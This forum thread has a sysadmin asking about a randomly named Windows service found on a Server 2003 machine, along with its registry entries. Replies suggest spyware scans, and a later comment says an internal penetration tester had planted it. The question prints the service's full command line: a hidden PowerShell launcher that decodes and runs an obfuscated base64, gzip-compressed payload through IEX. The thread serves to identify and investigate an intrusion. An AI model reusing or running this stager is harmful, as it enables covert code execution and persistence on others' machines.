# Strange entry in the Services list

Tags: drivers, powershell, services, windows-server-2003

(Please forgive me if I've posted this in the wrong exchange).

We had an issue with one of our servers this morning, due to a generator test. On examining the services more closely we found that one service had failed to start, which we promptly started.

Further down the list, however, I came across a very odd looking service with a display name of `yxEnkdrZymWygFLx`. The service was manual, and on closer inspection was found to contain the following:

```
C:\WINDOWS\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden 
  -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
  '\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object 
  System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop 
  -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String
  (''H4sIAP3mZVQCA71WbW/aSBD+nEr9D1aFZFvngB1I8yJVOtuEAMG8mUASiqLFXpuFt
  ZfYa17a63+/MdgJvaS9Xj+cFZT1zszu7PM8M2svCR1OWChMZ7Hd6OHHeDEUvr5/d9RFE
  QoEqbA6rShCYYWdvunO5aMjMBXCiDmV4YasH1FH+CRIY325rLIAkXByeWkmUYRDvn8vX
  mOuxzEOppTgWJKFv4TRDEf4uDOdY4cLX4XCY/GasimimdvWRM4MC8d66Ka2FnNQml/RX
  lLCJfHzZ1EeH2uT4tVTgmgsifY25jgoupSKsvBNTjccbJdYEi3iRCxmHi+OSFg+Kd6GM
  fJwG1ZbYQvzGXNjUYbTwF+EeRKFwnfnShfau0kiDLtg0l03wjFEFRvhii2wVAgTShXhT
  2mcZdFPQk4CDHaOI7a0cbQiDo6LdRS6FPexN5HaeJ0f/leDpMMg8OrySFaAmp+kazE3o
  Xi/gii/TjilVYbngFrA4tv7d+/febki5vXG6lAKMDoa78YYEpW6LCY7v0+CqggWbIU4i
  7bwWhhECZYnwjglYjyZCIXNde+iayTKj5fQcn/w5t1kfW+cYwbz4yEj7gTiMqoK86dH2
  muklh+Lroo9EuLqNkQBcXJdSW9Bjz2Kd6ct5m5tyE0SMwN2q5hiH/EUREUYvw67Cgh/j
  jUSQl0c6Q7QF0NWwKz8fTJ7XiSxEVo4ALT27yLQ4IGace6dKXib756+g5NoUhTHitBNo
  JwcRbAxothVBD2MSWbSE852Q/ElXSuhnDgo5vlyE/kFyWxHk4UxjxIHKITTD+wldgiiK
  RiKUCcuNrY28fOdxTehMBGlJPRhpRVQATMpBDZPhRFBkrkI5KKNeSNYUhyA2664axT5U
  MpZIezEhHzsiq/TzCW+13MKSY7FQZLAs00ZV4QhiTh0iRTeZ039diIHfSJLyYxwxo2UF
  8/Y2PJU8gWUXFxp2lm9dZaqO0drh03EAZdaxAIDxfhjxeYRoCZ9KHXItQ7PfSOklttcE
  K2xhp8Fv1tSbrDqmXvTnNdLlmPG3evauU7W/to5b+uOR85rzTvw6xG1cU7UdQ932je6W
  +sTbeHrbqdl9+fz7lXQajdiQ8vW2Mc6lUr9TtXL5UqnrC5c3Lwnmr/Q3XZA1psWjJ003
  oA4tUGvmmZ/OjqpPYxovVSpzbwRi+2PFeqiqrXVdYO5ZWt7p/XZoO4ERqk0TJq6AUdab
  mr9HjIDHa2rJW1o9G5rhn57ZfRQh3XLf8Dcg/tkjPwbZ33vIb2ht5ej5mnAekPqQkUP1
  XuvNJw5hlrtXnTM+l2MuqbG6LSkjZiO/P5oeOKbJ87MK12MWu1gqSNd70E+I+QbbHTTH
  5xC/EJrP+m1h8GL762x3obXM+9BO7OsTx9SkoHlwhd/07HCxwPaftShLRTFM0SBTmi5e
  XHVWFTLWmiXkTRCkg4v1wWOQkzhQoIrK1eoTilz0p6+67lwn+y7/ATq7BaG5ZM3R7Lw7
  Ci/9Ph86vLyAZIFuR9IsdjCoc9niropqyp0bXVTUeHYv35Oky230uGKStr8c8j+sRndb
  SandVHYToe4NrhQ60//C65Zac7gn/tvuL7M/cT6S1iryjMSryzfT/wn0H8XhBEiHAJsa
  C8U7y++t7HI5HTwnfBCF2jFy570662T8OM2fET8DZUmEcA4CgAA''));IEX (New-Obj
  ect IO.StreamReader(New-Object IO.Compression.GzipStream($s,
  [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';
  $s.UseShellExecute=$false;$p=[System.Diagnostics.Process]::Start($s);
```

(Note that I've broken this over several lines to make it 'readable').

The service itself had a name of `LzCNTZuKGyV` and was a manual process running under the local system account. (I've disabled the process for now until I can understand what it is).

I checked out the registry of the server and discovered several 'legacy' driver entries, all pointing to the service:

```
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_LZCNTZUKGYV]
"NextInstance"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_LZCNTZUKGYV\0000]
"Service"="LzCNTZuKGyV"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="yxEnkdrZymWygFLx"
```

My questions:

- has anyone seen anything like this before?
- Could this be some form of viral/trojan service?
- Is there any way of translating the Base 64 memory stream in the code above?

Comment: @downvoter, why a downvote without a valid explanation?

Answer (score 2, accepted):

8ECC055D-047F-11D1-A537-0000F8753ED1 is for a non-PNP class of drivers that is system-reserved.

It can be used by some sypware applications that compromised your browser to open backdoors.

Better scan your system for spyware. Run a scan with super anti-spyware and TDSSKiller.

Comment: Okay - scanned, but no cigar. I'm going to have to have a deeper look at this. Thank-you for your advice, Overmind.

Comment: I think you're on the right track here - I spoke with some of our network guys, and apparently we had an ethical hacker in the organisation looking for exploits etc. ... He found them!

Comment: Well, a legacy driver certainly would not of been named with a random string, so that being excluded, what remains must be something bad.